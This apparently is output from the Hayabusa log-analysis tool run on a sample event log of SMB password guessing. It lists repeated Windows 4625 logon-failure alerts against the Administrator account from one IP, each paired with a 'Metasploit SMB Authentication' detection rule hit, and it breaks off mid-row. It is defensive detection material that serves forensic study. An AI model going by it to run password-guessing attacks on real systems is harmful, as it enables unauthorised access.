Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OglsROoqX48xm0gJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5bNC9ES3l3KwXPxb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: byPavQuiscMm7CMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UQESAC3XpxCJJfG5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5aYRnzirSj0PNXAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8s9xJ659geFHOlY4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yBQdyO0diiFixwlx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vzULtccOFnLIRiVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1pDEGzqTAyUab5P8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gomgb26W9qFacRr7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GXOcDu88S5c5VwwV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WHRnzgQkfAhsUguj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0Q9ZIaRK43W9apv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2xvriGeIlDwtzS36 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pDYTFqeJC61Nneef : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0LNR7xCHW9x2q2qc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AE4EBj8X5IfXO8ZZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BEOSGw6TjZf9GWS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UCxe24uL4A6R9kgZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8v4DcIRkx43KCIs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CY2buVupQ5oR1Cp5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f6c3MlpMEzkCVud2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E2wV6op9AU4paDXp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BNn6aywSs67hVAO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wUa03SIX69WCIYbp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zYi4TB42B2VQm5Tr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9mnUbGMnlrOR8Tv4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CJGMWqgmbXABdPvB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2W9BbDYgC6vhqU3o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6DYsaih1Yhb2uOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q4o93QpJL4pxx94q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lQf1OsHb4lpgMPbl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HcJUYelneVqBQjr9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I0d6daEeIadJRbBI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SQ1hvZeT9aulbu4g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75RBCjr2eRDLhTqW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: maMlpuzhleuQHhIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkpNfbOHUr7cY52z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R7SUyYbLPfPAGUfw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7clwftf7R0uNbqJ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IsIyPcMAPnlxJa12 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4CKcyo1Ec4rs3Z2g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZlzKvZLO8CDotkbE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EyRpYYtmD8389Yvp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t3Pg0H9Gncoyr45m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zksaaJ7Z1wuy4PMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WdYAEdfWxLdM1rh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 